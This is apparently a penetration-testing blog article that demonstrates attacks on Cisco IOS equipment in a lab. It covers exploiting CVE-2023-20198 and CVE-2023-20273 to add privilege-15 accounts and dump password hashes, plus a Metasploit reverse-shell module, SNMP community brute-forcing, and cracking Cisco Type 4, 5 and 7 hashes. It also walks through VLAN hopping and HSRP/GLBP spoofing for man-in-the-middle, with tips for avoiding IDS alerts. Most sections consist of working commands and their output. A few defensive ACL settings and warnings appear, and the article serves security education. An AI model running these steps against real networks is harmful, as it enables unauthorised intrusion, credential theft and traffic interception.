Lyrica: Pentesting Cisco IOS
Cisco hardware is distributed around the world and is often the target of attackers. In this article, I will demonstrate a Cisco IOS pentest
Cisco hardware is distributed around the world and is often the target of attackers. In this article, I will demonstrate a Cisco IOS pentest.
Caster - Lyrica
Genre: Offensive
Label: exploit.org
Release Date: 3 July 2024
Performed by: Caster
Written by: Magama Bazarov
Cover Man: Magama Bazarov (Sony ILCE-7M3, f/5.6, 1/3 sec)
Intro
This article is intended to raise awareness among security engineers when operating Cisco equipment. Although it is an Offensive article, it is intended for both pentesters and network engineers.
"Disciple"
On April 24, 2024, I released a great article on Cisco IOS security, demonstrating the configuration of network security mechanisms. You'll find it useful.
https://blog.exploit.org/caster-disciple/
Disclaimer
This article is for informational purposes and is intended for security specialists conducting testing under an agreed contract. The author and exploit.org are not responsible for any damage caused by the use of the information provided.
Disruption of systems, hacking into other people's computer networks will be prosecuted. Be careful and do not try your luck.
CVE-2023-20273
Represents a vulnerability in the Cisco IOS XE Web UI interface. Essentially, this vulnerability is against the Web UI for managing Cisco IOS hardware.
CVE-2023-20273 is dangerous because it allows an attacker to execute system commands on the device while unauthenticated. Also, with this vulnerability, an attacker can inject a malicious implant to gain full control of the device.
This is a serious problem, not only because of the ease of exploit use, but because Cisco IOS control panels are often overlooked. In production networks this is a big problem, potentially a Cisco IOS device could be on the Internet with an open Web UI, which means an attacker could launch this attack from the Internet by breaching the external perimeter of the network.
I'll demonstrate the process of exploiting this vulnerability using Metasploit so you get the gist of the problem. In my lab network, I have a Cisco CSR under IP address 192.168.1.89
that is vulnerable to CVE-2023-20273.
caster@kali:~$ msfconsole
msf6 > use auxiliary/admin/http/cisco_ios_xe_os_exec_cve_2023_20273
So it is possible to attack Cisco IOS using this vulnerability, this is a serious issue, proving once again how important it is to filter access to the control panels of your network equipment
CVE-2023-20198
This vulnerability is also related to the Cisco IOS XE Web UI Feature. CVE-2023-20198 occurs due to incorrect path validation in nginx filtering, which allows bypassing authentication and accessing the webui_wsma_http
web interface endpoint. This workaround gives the attacker the ability to execute arbitrary Cisco IOS commands or make configuration changes with level 15 privileges.
In fact, because of this vulnerability, the attacker gains full control over the hardware.
Exploiting this vulnerability is very simple, all you need to do is download the exploit and conduct the attack. Another problem is the ease of exploitation, even a high school student can handle it.
caster@kali:~$ git clone https://github.com/smokeintheshell/CVE-2023-20198
With the -c
argument, you can check the target hardware for this vulnerability:
Getting the configuration
The -g
argument allows you to unload the entire configuration of the vulnerable hardware:
caster@kali:~/CVE-2023-20198$ ./exploit.py -t 192.168.1.89 -c
Creating an attacker account
You can create an account to get into the control panel:
caster@kali:~/CVE-2023-20198$ ./exploit.py -t 192.168.1.89 -a -u caster -p deftones-myownsummer
Selected Target: 192.168.1.89
Adding New Privilege 15 User
Add User Name: caster
Add User Pass: deftones-myownsummer
Sending exploit to target URL: http://192.168.1.89/%2577eb%2575i_%2577sma_Http
No reportable output from adding users
Check verbose ouput or get running config
Done.
Execution of IOS system commands
It is also possible to execute IOS system commands when exploiting this vulnerability:
caster@kali:~/CVE-2023-20198$ ./exploit.py -t 192.168.1.89 -e "show run | sec username"
Selected Target: 192.168.1.89
Running in Exec Mode
Executing Command: show run | sec username
Sending exploit to target URL: http://192.168.1.89/%2577eb%2575i_%2577sma_Http
username gestalt privilege 15 secret 9 $9$jyjNL./i5hMWCk$RrpsXqSmozq1KHYuGQQXtzv3mpQOKoNFyLr6EfUlubo
username death privilege 15 secret 5 $1$QRIf$jgEB4g2.MCKm.upWbfLbM0
username pregabalin150mg privilege 10 secret 8 $8$vsgWwxvLQJiDYU$D1rCRMZLhdphSn82D9rwpeCF5ZG75TY.15okuL/L1K2
username caster privilege 15 secret 9 $9$L4H.qKvAZ6tbW.$eEcAWawEJjbetZImz7Dlduw1d.fHeDiQQYBvXbfPGsc
Done.
This is how the CVE-2023-20198 vulnerability is exploited.
CVE-2023-20273 & CVE-2023-20198 Exploitation
Metasploit has a special module cisco_ios_xe_rce
, it exploits a chain of two vulnerabilities, CVE-2023-20198 and CVE-2023-20273. This leads to RCE and running the Meterpreter shell.
caster@kali:~$ msfconsole
msf6 > use exploit/linux/misc/cisco_ios_xe_rce
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(linux/misc/cisco_ios_xe_rce) >
msf6 exploit(linux/misc/cisco_ios_xe_rce) > set RHOSTS 192.168.1.89
RHOSTS => 192.168.1.89
A final word on these two vulnerabilities
The ease of exploitation of these vulnerabilities, as well as the consequences, further demonstrates the critical importance of monitoring access to your equipment's control panels. Especially if your equipment is facing the Internet.
This is a warning to network engineers, be careful and check your Cisco IOS control panel accesses to avoid what I have demonstrated above.
I will show a small example of how you can protect Cisco IOS control panels from attack, using ACL sheets.
Suppose we have a network of administrators 10.251.140.0/24
, only this network can access the control panel of Cisco equipment, other subnets will be blocked.
CSR(config)# ip access-list standard VTY_SEC
CSR(config-std-nacl)# permit 10.251.140.0 0.0.0.255
CSR(config-std-nacl)# deny any
CSR(config)# line vty 0 15
CSR(config-line)# access-class VTY_SEC in
CSR(config-line)# login on-failure log
CSR(config-line)# login on-success log
CSR(config)# ip http access-lists VTY_SEC
CSR(config)# ip http secure-server
This is how you can restrict access to the Cisco IOS hardware control panel, a fairly simple technique. Access to VTY only from the 10.251.140.0/24
network, others will be blocked access.
Evading RA Guard
RA Guard is designed to filter out illegitimate RA messages. Typically, an attacker uses RA to impose itself as a default gateway address at the IPv6 layer or as a DNS server at the IPv6 layer.
A popular tool among pentesters is mitm6; by manipulating RA/DHCPv6 messages, it allows an attacker to impose itself as a DNS server at the IPv6 level while performing an incomplete SLAAC attack.
However, it is worth noting that mitm6 relies more on DHCPv6 messages than RA.
An incomplete SLAAC attack is a phenomenon in which the attacker does not impose itself as a full-fledged default gateway address, limiting itself to only affecting DNS information
This is what an RA (Router Advertisement) message looks like:
Running mitm6 with the --no-ra
flag will allow mitm6 to run without sending RA messages to evade RA Guard:
caster@kali:~$ sudo mitm6 -i eth0 --no-ra
This way you can evade RA Guard if it is active on the switch at the time of your penetration testing project.
However, this attack will be thwarted by configured DHCPv6 Snooping
Identifying the Cisco IOS version
The definition of Cisco IOS is critical information for a pentester. A pentester who knows the Cisco IOS version can learn about its specifics, and it is also possible to find an exploit for a particular Cisco IOS version.
CDP
Is a neighbor discovery protocol for Cisco IOS hardware, but in most cases it is active by default on all ports on a Cisco device. This is what an attacker will see when analyzing the traffic:
This sensitive information can play a big role for the attacker. It is important to monitor the status of CDPs on device ports and carefully turn them off. Also consider that there may be VoIP on the network that depends on CDP.
SNMP
It is a protocol designed for monitoring network infrastructure, but SNMP is not an uncommon target of attacks inside a network. SNMP in the hands of a pentester can serve as a tool to gather information about hardware. This is accomplished by brute-force SNMP community string, with which the attacker can list information about the hardware.
Bruteforce SNMP Community string is possible with onesixtyone:
caster@kali:~$ onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp.txt 192.168.1.89
In the context of our case study, two strings are found, public
and private
In practice, public
and private
are the default strings in most cases. By the way, this is a common network security problem in production, many people forget about it.
In my lab bench at a Cisco router, the string public
has read-only (RO) permissions, private
has both read and write (RW) permissions.
A string with RO rights can be used to collect equipment information. For example, you can use the snmp_enum
module in Metasploit, a very handy tool.
msf6 auxiliary(scanner/snmp/snmp_enum) > show options
Module options (auxiliary/scanner/snmp/snmp_enum):
Name Current Setting Required Description
---- --------------- -------- -----------
COMMUNITY public yes SNMP Community String
RETRIES 1 yes SNMP Retries
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 161 yes The target port (UDP)
THREADS 1 yes The number of concurrent threads (max one per host)
TIMEOUT 1 yes SNMP Timeout
VERSION 1 yes SNMP Version <1/2c>
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/snmp/snmp_enum) >
My router in the lab has an address of 192.168.1.89
, so let's specify it in RHOSTS
msf6 auxiliary(scanner/snmp/snmp_enum) > set RHOSTS 192.168.1.89
RHOSTS => 192.168.1.89
msf6 auxiliary(scanner/snmp/snmp_enum) > run
This is roughly how you can discover the Cisco IOS version. By analyzing CDP protocol traffic and using SNMP renumbering, having previously guessed the community string.
Cisco Passwords
Cisco IOS passwords reside locally on the hardware and are protected using cryptographic hash functions. However, there are security issues here as well, in the form of insecure password hashing methods. Below I will explain why.
Type 4
Appeared in 2013, it uses the PBKDF2 and was originally designed to reduce vulnerability to brute force attacks. However, due to an implementation issue, the Type 4 algorithm only performs one SHA-256 iteration (without using salt) over the entered plaintext password, making it less secure than Type 5 and more vulnerable to brute force attacks. Passwords are stored as hashes in a configuration file
username myths secret 4 g1rTD89b38NIXbGJse.zLc7Cega1TBTlKQNvYDh9Qo6
Such hashes can be bruteforсed using John the Ripper. Just specify the file with the hash and the path to the dictionary, nothing complicated
caster@kali:~/gestalt$ cat hashes
myths:g1rTD89b38NIXbGJse.zLc7Cega1TBTlKQNvYDh9Qo6
caster@kali:~/gestalt$ john hashes --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA256 [SHA256 512/512 AVX512BW 16x])
Warning: poor OpenMP scalability for this hash type, consider --fork=4
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
P@ssw0rd (myths)
1g 0:00:00:00 DONE (2024-06-30 02:28) 50.00g/s 6553Kp/s 6553Kc/s 6553KC/s 123456..kovacs
Use the "--show --format=Raw-SHA256" options to display all of the cracked passwords reliably
Session completed.
Type 5
Type 5 uses a very simple MD5 hashing algorithm - 1000 iterations of MD5 with a 32-bit salt. Type 5 passwords are relatively easy to crack by brute force using modern computers and available tools. Passwords are stored as hashes in a configuration file.
caster@kali:~/gestalt$ cat hashes
drift:$1$TlXl$FlGAzr9Hn8VqowimPu.TD/
caster@kali:~/gestalt$ john hashes --wordlist=/usr/share/wordlists/rockyou.txt
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 512/512 AVX512BW 16x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
cisco (drift)
1g 0:00:00:00 DONE (2024-06-30 02:38) 20.00g/s 491520p/s 491520c/s 491520C/s 210586..20032003
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Type 7
An extremely insecure way to protect passwords, it uses the Vigenère cipher. It is very easy to crack. using tools such as ciscot7, cisco7crack.
username enchant password 7 055A545C7519
caster@kali:~/gestalt$ cisco7crack 055A545C7519
Encrypted string : 055A545C7519
Plain string : 12345
caster@kali:~/gestalt$
TACACS+
This protocol is similar to RADIUS and is used in the Cisco ecosystem to control access to equipment using a AAA server.
However, there is a risk of TACACS+ traffic being intercepted and the key being brute force, so care must be taken to keep the TACACS+ key secure
If an attacker performs a MITM attack and intercepts TACACS+ traffic, they have the ability to brute force the key. To intercept and brute force the attacker uses Loki
So if you have TACACS+ on your network, take care of key bruteforce resistance.
SMI (2960-X)
Operation of Cisco Smart Install among pentesters is not new. However, there is a risk of disrupting the Cisco 2960-X switch. For some reason 2960-X reacts strangely to SIET exploit and at the moment of exploitation DoS occurs and the switch freezes, not even responding to ICMP Echo requests.
If you find SMI (TCP/4786) in your project, please check with your client to see if 2960-X is there by any chance. If it is present - do not take risks and do not exploit this hole. Be careful with SIET.
Don't use CAM Table Overflow
I have noticed that this attack is often explained in network security training materials, but this attack is not applicable to production networks.
CAM Table Overflow can not only overload the switch CPU but also cause Unicast Flood. This is a phenomenon where Unicast traffic starts to propagate as broadcast traffic. This can have a serious impact on network performance.
This attack sounds cool only in words, but I would not recommend using this attack in production. CAM Table Overflow has serious side effects.
VoIP VLAN Hopping
The Cisco Discovery Protocol (CDP) can be used by attackers to perform VLAN Hopping, allowing unauthorized access to various VLANs, including VoIP VLAN.
Concept
The concept is simple enough. You need to capture a CDP frame of a legitimate VoIP phone, and then use tcpreplay to replay that frame so that the attacker's laptop can pretend to be the phone to gain access to the Voice VLAN.
Stage I: Learning about switch port information
It is necessary to study the operation of the switch port, information how it is configured. This is accomplished by analyzing the CDP frame. You will have to temporarily disconnect the VoIP phone and connect your device into the switch.
Based on the dump of this traffic we can see that the port is indeed configured for Voice VLAN.
The switch port is GigabitEthernet1/0
, Voice VLAN ID is 512
Stage II: Capture and analyze a CDP frame from a phone
Now plug the VoIP phone back into the switch, and plug yourself into the VoIP phone's data port. Now we need to capture a CDP frame from the VoIP phone itself. I'll be using Wireshark for this.
Phone - Cisco IP Phone 7945G
Voice VLAN ID - 512
I need to save this traffic dump.
Stage III: Play back a CDP frame from VoIP
Now you need to replay the captured pcap to pretend to be an IP phone.
This can be done with tcpreplay, a utility that will replay the traffic. When the CDP frame of the VoIP phone arrives on the switch port, the voice VLAN will be available to the attacker.
However, you must consider that a Cisco legacy phone would send a CDP frame every 60 seconds. You need to send this frame every 60 seconds, you can also use watch
to do this
caster@kali:~$ sudo watch -n 60 "tcpreplay -i eth0 cdpvoip.pcap"
Stage IV: Virtual VLAN Interfaces
After playing a CDP frame, a virtual 802.1Q interface must be created to work with the Voice VLAN. It is required to work with the target VLAN.
caster@kali:~$ sudo apt install vlan
caster@kali:~$ sudo vconfig add eth0 512
caster@kali:~$ sudo ip link set eth0.512 up
caster@kali:~$ sudo dhclient -v eth0.512
Create the interface using vconfig
, raise to the up
state, and then request an address via DHCP. The attacker can obtain the address either by DHCP or by configuring it statically.
This concludes the chapter on VoIP VLAN Hopping, despite the presence of the voiphopper utility that automates the whole process, I decided to explain this attack in detail so that you can better understand what is involved.
DTP Attacks (VLAN Hopping)
One of the most common network attacks on Cisco equipment, an extremely hackneyed topic really. However, it is a rare misconfig. It occurs on forgotten ports of Cisco 2960 switch, a kind of Shadow IT.
Most likely, such a port will be encountered in the context of an internal pentest in the customer's infrastructure.
The essence of a DTP attack is to send a specially prepared DTP Desirable frame that will switch the switch port to Trunk.
The problem is that all Cisco 2960 switch ports are in Dynamic Auto mode by default. And if a DTP Desirable frame is sent to such ports, the switch port will switch to trunk mode. It is important to take into account that the dynamic trunk lives only 5 minutes, so the DTP Desirable frame will have to be sent with a certain periodicity in order not to lose the trunk.
You can use the Loki tool to attack the DTP.
Now the switch port to which the attacker is connected is switched to trunk mode.
By analyzing the STP frames after VLAN switching, we can see the VLAN ID (Root Bridge System ID Extension)
VLANs: 120
,140
,175
,180
,200
Also looking at these STP frames, we can see 802.1Q tags there. This is understandable, because we are on a trunk port, and the frames are tagged on the trunk port. That's just for the record.
Now for the target VLAN IDs, you need to create virtual interfaces to jump to those VLANs. You can use vconfig to do this:
caster@kali:~$ sudo vconfig eth0 120
caster@kali:~$ sudo vconfig eth0 140
caster@kali:~$ sudo vconfig eth0 175
caster@kali:~$ sudo vconfig eth0 180
caster@kali:~$ sudo vconfig eth0 200
caster@kali:~$ sudo ip link set eth0.120 up
caster@kali:~$ sudo ip link set eth0.140 up
caster@kali:~$ sudo ip link set eth0.175 up
caster@kali:~$ sudo ip link set eth0.180 up
caster@kali:~$ sudo ip link set eth0.200 up
You then need to obtain addresses for these virtual interfaces for networking within the target VLANs:
caster@kali:~$ sudo dhclient -v eth0.120
caster@kali:~$ sudo dhclient -v eth0.140
caster@kali:~$ sudo dhclient -v eth0.175
caster@kali:~$ sudo dhclient -v eth0.180
caster@kali:~$ sudo dhclient -v eth0.200
Example of obtaining an address via DHCP for interface eth0.140
This is how VLAN hopping can be accomplished using the shortcomings of the DTP protocol.
In fact, this case is rare, but that doesn't mean it won't happen at all.
HSRP Attacks
HSRP (Hot Standby Router Protocol) - is a router redundancy protocol developed by Cisco to improve network availability. It allows multiple routers to share a single virtual IP address, providing automatic switchover to a backup router in the event of a primary router failure. This is one of the protocols of the FHRP (First Hop Redundancy Protocol) class.
Used in Cisco networks, it offers a hot standby system but does not do load balancing. This chapter deals with an HSRP attack followed by a MITM attack.
HSRP Theory
HSRP works by creating a group of routers, one of which is designated as the active router and the others as backup routers. The active router is responsible for handling traffic using a virtual IP address. If the active router fails, one of the standby routers automatically becomes the active router, ensuring continuity of service.
You can delve a little deeper into HSRP terminology to understand what kind of entities the HSRP group has:
HSRP Active — a device that acts as a virtual router and provides forwarding of traffic from source networks to destination networks.
HSRP Standby — a device that acts as a standby router, waiting for the active router to fail. When the primary Active router fails, the Standby router will take over the primary role and take over the duties of the Active router.
HSRP Group — a group of devices that ensures the operation and fault tolerance of a logical router.
HSRP MAC Address — the virtual MAC address of the logical router in the HSRP domain.
HSRP Virtual IP Address — This is a special virtual IP address in the HSRP group. This IP address will be the default gateway for the end hosts, used on the logical router itself.
This protocol has two versions (HSRPv1, HSRPv2) and they differ in the following characteristics:
- Virtual MAC addresses: (HSRPv1 —
00:00:0c:07:ac:XX
/ HSRPv2 -00:00:0C:9F:FX:XX
) (XX - HSRP group number) - Multicast addresses: HSRPv1 —
224.0.0.2
, HSRPv2 -224.0.0.102
- Number of groups: HSRPv1 offers up to 255 groups, when HSRPv2 can up to 4096
Theory of attack
The essence of an HSRP domain attack is to send a false HSRP packet with the maximum priority value. This is done to take over the Active role, and in fact the attacker's device will serve the entire segment traffic - MITM attack
However, this attack is dangerous because if the attacker fails to handle such a heavy load, the traffic of all hosts in the segment will go through the attacker's device. And besides, it is impossible to jump beyond the capacity of the switch port you are connected to.
If you decide to launch this attack, make sure you have a powerful computer and a fast network interface. It would be funny if you spoofed FHRP with a 100-bit interface.
HSRP Lab Network
In my lab, the attacker is on the 172.16.0.0/24
network.
There are two HSRP speakers, under IP addresses 172.16.0.1
and 172.16.0.2
, they serve a virtual HSRP address 172.16.0.254
which is the default gateway for legitimate clients.
The attacker's IP address is 172.16.0.3
- it will attack the HSRP domain
For spoofing, I'll be using the Loki tool. It is an old but very powerful tool for network attacks. It supports attacks against FHRP, HSRP among others, even with authentication support.
I will be using it in the course of my work.
Preparing and tuning the kernel
However, before MITM, you need to prepare your host, allow routing, and perform kernel tuning.
- A classic of the genre: switch your interface to promiscuous mode and allow routing. Allowing routing is a very important setting, because without it, during MITM, traffic from legitimate hosts will bump into your OS and will not go any further, which will cause DoS. It is also best to disable ICMP Redirect. When MITM occurs, your machine may generate these messages, which will alarm IDS/IPS system sensors.
caster@kali:~$ sudo ip link set dev eth0 promisc
caster@kali:~$ sudo sysctl -w net.ipv4.ip_forward=1
caster@kali:~$ sudo sysctl -w net.ipv4.conf.all.accept_redirects=0
caster@kali:~$ sudo sysctl -w net.ipv6.conf.all.accept_redirects=0
- FTP, H.323 and other traffic that does not work well with NAT can pass through you. The nf_conntrack module will help to pass traffic of such protocols.
caster@kali:~$ sudo modprobe nf_conntrack
- With MITM, your device must be prepared to handle a lot of traffic. You can tweak the Linux kernel a bit to optimally handle the large amount of traffic you will receive during network spoofing.
caster@kali:~$ sudo sysctl -w fs.file-max=100000
caster@kali:~$ sudo sysctl -w net.core.somaxconn = 65535
caster@kali:~$ sudo sysctl -w net.core.netdev_max_backlog = 65536
caster@kali:~$ sudo sysctl -w net.ipv4.tcp_fin_timeout=15
caster@kali:~$ sudo sysctl -w net.ipv4.tcp_tw_reuse=1
caster@kali:~$ sudo sysctl -w net.ipv4.tcp_tw_recycle=1
caster@kali:~$ sudo sysctl -w net.ipv4.tcp_max_tw_buckets=65536
fs.file-max=100000
- increases the maximum number of file descriptors that can be opened simultaneously. This is important because each network connection requires a file descriptor. Increasing this value allows your laptop to handle more connections at the same time;net.core.somaxconn = 65535
- sets the maximum number of pending connections in the queue for sockets. In a MITM attack, especially FHRP spoofing, there may be many incoming connections waiting to be processed. This value increases the connection queue, which prevents connections from being dropped;net.core.netdev_max_backlog=65536
- sets the maximum number of packets that can be queued on a network interface before being processed by the kernel. This allows your laptop to handle large amounts of incoming traffic more efficiently, which is critical for MITM attacks;net.ipv4.tcp_fin_timeout=15
- reduces the waiting time before closing a connection after sending a FIN segment. This helps free up resources for new connections faster, which is useful for the large number of short connections typical of MITM attacks;net.ipv4.tcp_tw_reuse=1
- allows you to reuse temporary (TIME-WAIT) TCP connections for new connections. This helps to avoid port shortages when there are a large number of short-lived connections;net.ipv4.tcp_tw_recycle=1
- includes fast processing of temporary (TIME-WAIT) TCP connections. This allows resources to be released faster for new connections, which can be useful in heavy traffic, although it carries security risks;net.ipv4.tcp_max_tw_buckets=65536
- increases the maximum number of temporary (TIME-WAIT) TCP connections that the system can handle simultaneously. This allows your laptop to handle more connections without dropping them prematurely.
- TCP Window Scaling controls the scaling of the TCP window. Increasing the TCP window can improve data transfer performance in a high latency or high load network. In TCP, each side sets the size of the window. The appropriate number of bytes can be sent without acknowledgment. Window Scaling provides the ability to increase this window size, which is especially useful when dealing with high-speed networks.
caster@kali:~$ sudo sysctl -w net.ipv4.tcp_window_scaling=1
Spoofing
You need to launch Loki and select the network interface to attack. In my case, it is eth0
If we analyze the HSRP traffic in more detail, we can see that the Active router priority is 150, which is less than 255. The group number is 1 and there is no authentication.
Then you need to start spoofing by clicking on Get IP and also check the Gratuitous ARP box.
Gratuitous ARP - this is a special type of ARP frame that notifies the entire link segment that a new MAC address and IP address mapping has occurred.
You must then assign the HSRP virtual address to your interface as a secondary. Since we start serving this address after the attack, it is very important to put it on our interface.
caster@kali:~$ sudo ifconfig eth0:1 172.16.0.254 netmask 255.255.255.0
You will then need to configure a new default route and delete the old one. The new route will need to be built through the former Active router. If this is not done, legitimate host traffic will be closed to the attacker's computer, which will inevitably lead to DoS.
caster@kali:~$ sudo route del default
caster@kali:~$ sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 172.16.0.1
You can also enable NAT, to capture not only incoming traffic, but also outgoing traffic.
caster@kali:~$ sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
However, this NAT rule may cause side effects. For example, a customer's infrastructure may have Zabbix agents that an attacker could spoof. And this rule could lead to the fact that the Zabbix server could no longer reach Zabbix agents, because it would essentially spoof the addresses of legitimate hosts.
This concludes the attack on HSRP, it's time to analyze the traffic for sensitive data:
Verification of a captured lyrica
account:
Authentication Cracking
Potential authentication in the HSRP domain can make life difficult for an attacker, but the mere presence of authentication does not mean anything, an attacker may well be able to brute force the authentication password.
This is accomplished by listening and recording traffic, then exfiltrating the hashes with hsrp2john.py
, and then bruteforcing with John.
caster@kali:~/lyrica$ python2 hsrp2john.py hsrptraffic.pcap
This is how you can perform an authentication attack on an HSRP domain. The password is myownsummershoveit
GLBP Attacks
GLBP (Gateway Load Balancing Protocol) is a protocol developed by Cisco to provide load balancing and fault tolerance in networks. It allows multiple routers to share a single virtual IP address and dynamically distribute load among them.
Another protocol from the FHRP class and also made by Cisco engineers. This protocol differs from HSRP in that it offers load balancing in addition to redundancy.
GLBP Theory
GLBP works by creating a group of routers, one of which is designated as the active virtual gateway (AVG) and the others as active virtual forwarders (AVFs). The AVG is responsible for load balancing among the AVFs by assigning to each request the virtual MAC address of one of the AVFs.
GLBP terminology is as follows:
- AVG (Active Virtual Gateway) — a device that is essentially the father of the entire GLBP logical domain. AVG tells the other routers how to handle legitimate traffic. Gives out MAC addresses and is responsible for answering ARP requests. By the way, within a single GLBP group, AVG members can be only one router.
- AVF (Active Virtual Forwarder) — the device in the GLBP domain that handles traffic. There can be several of them.
- GLBP Group — A logical GLBP group that includes physical routers. Each GLBP logical group has its own unique numeric identifier
- GLBP MAC — The virtual MAC address of the AVF members distributed by the existing AVG router.
- GLBP Virtual IP Address — The IP address the AVG router is responsible for
- GLBP Preempt Mode — an option that allows the resurrected AVG device to regain its role after being replaced by AVF based on its priority values. By default, preempt mode is disabled for AVG members when preempt mode is enabled for AVF members (with a delay of up to 30 seconds, but this value can be configured manually)
- GLBP Weight — metric indicating the degree of load on the device interface. The greater this metric is, the higher the load on the router interface.
GLBP Spoofing Theory
It's actually the same thing with HSRP. Send the packet with the highest priority and weight value. This will also happen with Loki.
GLBP Lab Network
In my lab, the attacker is on the 172.16.0.0/24
network.
There are 2 GLBP speakers here, 172.16.0.1
is an AVG router when 172.16.0.2
is an AVF router. They serve the address 172.16.0.0.254
.
The attacker's address is 172.16.0.3
GLBP Spoofing
The preparation is the same as I covered in the HSRP chapter, keep in mind.
Likewise, start Loki and choose your network interface.
This is what a GLBP packet from an AVG router looks like. Priority is 130, GLBP group number is 1.
Now you need to do some spoofing, you should also click on Get IP and select Gratuitous ARP.
Loki will generate a special GLBP packet with a priority of 255 and a weight value of 255. The higher the GLBP weight, the higher the load on the interface.
Then set the GLBP virtual address as the secondary address on its interface:
caster@kali:~$ sudo ifconfig eth0:1 172.16.0.254 netmask 255.255.255.0
And then set up a new default route through the former AVG router, deleting the old one before doing so. Again, if you don't do this, legitimate hosts traffic will be closed to your device, which will lead to DoS.
caster@kali:~$ sudo route del default
caster@kali:~$ sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 172.16.0.1
This completes the attack on GLBP, you can listen to the traffic for sensitive data:
Verify this account from FTP:
This is how the GLBP is being attacked. The attack actually carries a lot of risks, so it is not always used, even if the GLBP configuration is vulnerable to this attack
Searching for subnets with EIGRP
EIGRP (Enhanced Interior Gateway Routing Protocol) - is a dynamic routing protocol developed by Cisco for use in enterprise networks. It is efficient and scalable, but can be vulnerable to attack if not properly configured.
In fact, there are plenty of attacks on dynamic routing, but they have very little impact. Perhaps the most practical attack is subnet discovery.
Its essence lies in the fact that the attacker connects to the routing domain, and since at the moment of establishing a neighborhood there is an automatic exchange of routing information - the attacker already knows about these or those subnets, without resorting to scanning. This is a useful time-saving trick.
Within my lab network, there is an EIGRP speaker under the address 192.168.1.89
The AS number is 100.
FRRouting
With FRR, an attacker can connect to the EIGRP routing domain. But it requires a little bit of configuration.
caster@kali:~$ sudo apt install frr
After installing FRRouting, you must make an adjustment to the daemons
configuration file, specify eigrpd=yes
caster@kali:~$ sudo nano /etc/frr/daemons
caster@kali:~$ sudo systemctl restart frr
Now you need to log in to the FRR control panel:
caster@kali:~$ sudo vtysh
Now you need to start the EIGRP process with an AS number of 100
, and declare your address with a /32
mask to set the neighborhood.
kali# config t
kali(config)# router eigrp 100
kali(config-router) network 192.168.1.103/32
The screenshot above shows the EIGRP traffic, at the time the neighborhood was set up. To see a list of your EIGRP neighbors:
kali# show ip eigrp neighbors
After establishing the neighborhood between the attacker and the EIGRP speaker, two new subnets, 10.134.25.0/24
and 10.178.121.0/24
, appeared in the attacker's routing table
This is the collection of subnet information by, shall we say, abusing dynamic routing protocols.
Searching for subnets with OSPF
OSPF (Open Shortest Path First), an intradomain dynamic routing protocol, is used in almost every major corporate network.
In the context of an attack, it can also be useful, it is a subnet search. Same trick as with EIGRP.
However, you have to realize that OSPF and EIGRP are completely different protocols, with their own philosophy.
You must enable the ospfd
daemon to run the OSPF process on the attacker's computer:
You then need to connect to the OSPF domain, this is done by declaring your address. In my case it is 192.168.1.103/32
, the area is 0.0.0.0
kali# conf t
kali(config)# router ospf
kali(config-router)# network 192.168.1.103/32 area 0.0.0.0
kali(config-router)#
This is traffic at the time of neighbor establishment, OSPF service message exchange (DB Description, LSU, LSR, LSAck):
OSPF neighboring is established, my neighbor is 192.168.1.89
kali# show ip ospf ne
Neighbor ID Pri State Up Time Dead Time Address Interface RXmtL RqstL DBsmL
10.134.25.11 1 Full/DR 2m07s 35.482s 192.168.1.89 eth0:192.168.1.103 0 0 0
kali#
If we look at the routing table, we see new routes!
kali# show ip route
Codes: K - kernel route, C - connected, L - local, S - static,
R - RIP, O - OSPF, I - IS-IS, B - BGP, E - EIGRP, N - NHRP,
T - Table, v - VNC, V - VNC-Direct, A - Babel, F - PBR,
f - OpenFabric, t - Table-Direct,
> - selected route, * - FIB route, q - queued, r - rejected, b - backup
t - trapped, o - offload failure
K>* 0.0.0.0/0 [0/100] via 192.168.1.1, eth0, src 192.168.1.103, 00:08:36
O 10.134.25.0/24 [110/101] via 192.168.1.89, eth0 inactive, weight 1, 00:02:19
O 10.178.121.0/24 [110/101] via 192.168.1.89, eth0 inactive, weight 1, 00:02:19
O>* 192.168.1.0/24 [110/100] is directly connected, eth0, weight 1, 00:02:22
L>* 192.168.1.103/32 is directly connected, eth0, 00:08:36
It's 10.134.25.0/24
and 10.178.121.0/24
The attacker learned information about them without the use of scanning. This is the benefit of this trick, simple FRR setup, neighborhood setup and gathering information about existing networks. It's as simple as that.
Router Configuration Upload
If an attacker finds an SNMP RW string against a Cisco router, they will be able to offload the configuration of the router itself in plaintext. You can use a Metasploit module called cisco_config_tftp to do this. By obtaining such a configuration file, an attacker can learn about infrastructure features, learn hashes, attempt to brute forcethem, etc.
Actually a fairly simple attack vector, first find the RW string and then run the MSF module.
SNMP RW string bruteforce can be performed using onesixtyone:
caster@kali:~$ onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp.txt 192.168.1.89
Scanning 1 hosts, 3219 communities
192.168.1.89 [public] Cisco IOS Software [Amsterdam], Virtual XE Software (X86_64_LINUX_IOSD-UNIVERSALK9-M), Version 17.3.2, RELEASE SOFTWARE (fc3) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2020 by Cisco Systems, Inc. Compiled Sat 31-Oct-20 13:1
192.168.1.89 [public] Cisco IOS Software [Amsterdam], Virtual XE Software (X86_64_LINUX_IOSD-UNIVERSALK9-M), Version 17.3.2, RELEASE SOFTWARE (fc3) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2020 by Cisco Systems, Inc. Compiled Sat 31-Oct-20 13:1
